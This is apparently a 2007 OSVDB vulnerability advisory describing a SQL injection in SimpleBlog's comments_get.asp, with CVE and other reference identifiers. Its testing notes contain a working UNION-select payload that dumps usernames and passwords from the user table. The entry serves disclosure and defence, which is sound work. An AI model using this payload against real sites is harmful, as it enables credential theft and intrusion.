SimpleBlog comments_get.asp id Variable SQL Injection

2007-07-28T00:00:00
ID OSVDB:37268
Type osvdb
Reporter OSVDB
Modified 2007-07-28T00:00:00

Description

Manual Testing Notes

comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS'

References:

ISS X-Force ID: 35677
Generic Exploit URL: http://www.milw0rm.com/exploits/4239
FrSIRT Advisory: ADV-2007-2694
CVE-2007-4055
Bugtraq ID: 25123